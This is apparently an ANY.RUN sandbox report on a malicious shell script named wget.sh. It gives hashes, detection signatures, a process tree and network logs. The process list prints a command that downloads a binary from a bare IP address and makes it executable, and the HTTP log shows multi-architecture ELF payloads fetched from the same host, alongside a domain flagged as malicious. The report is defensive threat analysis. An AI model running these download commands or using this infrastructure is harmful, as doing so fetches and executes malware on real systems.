File name:

wget.sh

Full analysis: https://app.any.run/tasks/30b63e9f-730d-4f91-a52b-bd0faa22d28b
Verdict: Malicious activity
Analysis date: January 27, 2025, 05:05:53
OS: Ubuntu 22.04.2 LTS
MIME: text/plain
File info: ASCII text
MD5:

04D5EFF4E902E25EFA009361F6C594A0

SHA1:

1F57D3E8574F13156C5441E98651E3AFA3E6386B

SHA256:

15507A64CCC79B5287967B8234C33BB63722AD9C1407A85E9242073C120B1A3F

SSDEEP:

12:lI+vIXjIBNIl5tIyf0LK4IM+O1Il7I7TMfIluStI1tjIEjItJeItT4n:lIqIXjIBNI7tIyqK4IJWIl7IvEIU8I1N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 38750)
    • Potential Corporate Privacy Violation

      • wget (PID: 38755)
      • wget (PID: 38759)
      • wget (PID: 38775)
      • wget (PID: 38771)
      • wget (PID: 38763)
      • wget (PID: 38767)
      • wget (PID: 38791)
      • wget (PID: 38783)
      • wget (PID: 38779)
      • wget (PID: 38787)
      • wget (PID: 38795)
      • wget (PID: 38807)
    • Connects to the server without a host name

      • wget (PID: 38771)
      • wget (PID: 38775)
      • wget (PID: 38767)
      • wget (PID: 38779)
      • wget (PID: 38763)
      • wget (PID: 38783)
      • wget (PID: 38787)
      • wget (PID: 38791)
      • wget (PID: 38795)
      • wget (PID: 38807)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 38752)
      • dash (PID: 38798)
      • dash (PID: 38810)
    • Modifies file or directory owner

      • sudo (PID: 38747)
    • Uses wget to download content

      • bash (PID: 38752)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
269
Monitored processes
61
Malicious processes
3
Suspicious processes
9

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs dash no specs bash no specs locale-check no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs x86 no specs dash no specs busybox wget rm no specs mkdir no specs mv no specs chmod no specs dash no specs busybox no specs busybox no specs chmod no specs x86_64 no specs rm no specs dash no specs x86_64 rm no specs mkdir no specs chmod no specs x86_64 no specs x86_64 no specs

Process information

PID
CMD
Path
Indicators
Parent process
38746/bin/sh -c "sudo chown user /home/user/Desktop/wget\.sh && chmod +x /home/user/Desktop/wget\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/wget\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38747sudo chown user /home/user/Desktop/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38748chown user /home/user/Desktop/wget.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38749chmod +x /home/user/Desktop/wget.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38750sudo -iu user /home/user/Desktop/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38751/bin/sh -e /etc/NetworkManager/dispatcher.d/01-ifupdown connectivity-change/usr/bin/dashnm-dispatcher
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38752-bash --login -c \/home\/user\/Desktop\/wget\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38754/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38755wget http://195.177.95.92/arm/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38756chmod 777 arm/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
16
DNS requests
58
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
38767
wget
GET
200
195.177.95.92:80
http://195.177.95.92/arm7
unknown
unknown
38755
wget
GET
200
195.177.95.92:80
http://195.177.95.92/arm
unknown
unknown
38763
wget
GET
200
195.177.95.92:80
http://195.177.95.92/arm6
unknown
unknown
38759
wget
GET
200
195.177.95.92:80
http://195.177.95.92/arm5
unknown
unknown
38771
wget
GET
200
195.177.95.92:80
http://195.177.95.92/m68k
unknown
unknown
38775
wget
GET
200
195.177.95.92:80
http://195.177.95.92/mips
unknown
unknown
38779
wget
GET
200
195.177.95.92:80
http://195.177.95.92/mpsl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
38755
wget
195.177.95.92:80
WINDSTREAM
US
unknown
38759
wget
195.177.95.92:80
WINDSTREAM
US
unknown
38763
wget
195.177.95.92:80
WINDSTREAM
US
unknown
38767
wget
195.177.95.92:80
WINDSTREAM
US
unknown
38771
wget
195.177.95.92:80
WINDSTREAM
US
unknown
38775
wget
195.177.95.92:80
WINDSTREAM
US
unknown
38779
wget
195.177.95.92:80
WINDSTREAM
US
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 185.125.190.98
  • 91.189.91.48
  • 91.189.91.98
  • 185.125.190.96
  • 91.189.91.49
  • 91.189.91.97
  • 185.125.190.18
  • 185.125.190.17
  • 185.125.190.97
  • 185.125.190.48
  • 185.125.190.49
  • 91.189.91.96
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::198
  • 2001:67c:1562::23
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 2001:67c:1562::24
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::23
whitelisted
google.com
  • 142.250.186.110
  • 2a00:1450:4001:806::200e
whitelisted
panel.daudau.org
malicious
186.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
38755
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38759
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38763
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38767
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38771
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38775
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38779
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38783
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38787
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38791
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info